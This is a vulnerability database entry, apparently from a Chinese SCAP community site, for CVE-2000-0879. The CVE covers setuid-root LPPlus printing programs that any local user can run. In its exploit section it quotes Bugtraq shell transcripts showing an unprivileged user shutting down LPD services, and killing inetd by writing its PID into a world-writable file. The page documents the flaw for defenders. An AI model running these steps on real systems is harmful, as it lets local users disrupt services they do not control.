CVE-2000-0879
CVSS2.1
发布时间 :2000-11-14 00:00:00
修订时间 :2008-09-05 16:22:05
NMCOS    

[原文]LPPlus programs dccsched, dcclpdser, dccbkst, dccshut, dcclpdshut, and dccbkstshut are installed setuid root and world executable, which allows arbitrary local users to start and stop various LPD services.


[CNNVD]LPPlus许可DoS漏洞(CNNVD-200011-043)

        LPPlus程序dccsched,dcclpdser,dccbkst, dccshut,dcclpdshut,和dccbkstshut安装了setuid根且具有全域可执行性,任意本地用户利用该漏洞启动和停止多种LPD服务。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:plus_technologies:lpplus:3.2.2
cpe:/a:plus_technologies:lpplus:3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0879
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0879
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-043
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/5199.php
(UNKNOWN)  XF  lpplus-permissions-dos
http://www.securityfocus.com/bid/1643
(VENDOR_ADVISORY)  BID  1643
http://archives.neohapsis.com/archives/bugtraq/2000-08/0531.html
(VENDOR_ADVISORY)  BUGTRAQ  20000906 Multiple Security Holes in LPPlus

- 漏洞信息

LPPlus许可DoS漏洞
低危 访问验证错误
2000-11-14 00:00:00 2005-10-20 00:00:00
本地  
        LPPlus程序dccsched,dcclpdser,dccbkst, dccshut,dcclpdshut,和dccbkstshut安装了setuid根且具有全域可执行性,任意本地用户利用该漏洞启动和停止多种LPD服务。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息

13741
LPPlus dccsched Permission Weakness Arbitrary LPD Process Manipulation

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-09-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LPPlus Permissions DoS Vulnerabilities
Access Validation Error 1643
No Yes
2000-09-06 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to bugtraq by Dixie Flatline <echo8@firest0rm.org> on Wed, 6 Sep 2000

- 受影响的程序版本

Plus Technologies LPPlus 3.3
Plus Technologies LPPlus 3.2.2

- 漏洞讨论

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:

$LPHOME/bin/dccsched
$LPHOME/bin/dcclpdser
$LPHOME/bin/dccbkst

These start the scheduler, LPD server and network status daemons.

$LPHOME/bin/dccshut
$LPHOME/bin/dcclpdshut
$LPHOME/bin/dccbkstshut

These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

- 漏洞利用

The following exploits were excerpted verbatim from the original bugtraq post, referenced in the credit section:

Vulnerability #1:

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
$

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat &gt; $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站